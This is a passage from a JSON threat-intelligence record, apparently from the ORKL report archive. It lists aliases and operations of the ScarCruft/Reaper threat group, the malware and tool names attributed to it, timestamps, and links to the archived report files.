				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434623,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.pdf",
		"text": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.txt",
		"img": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.jpg"
	}
}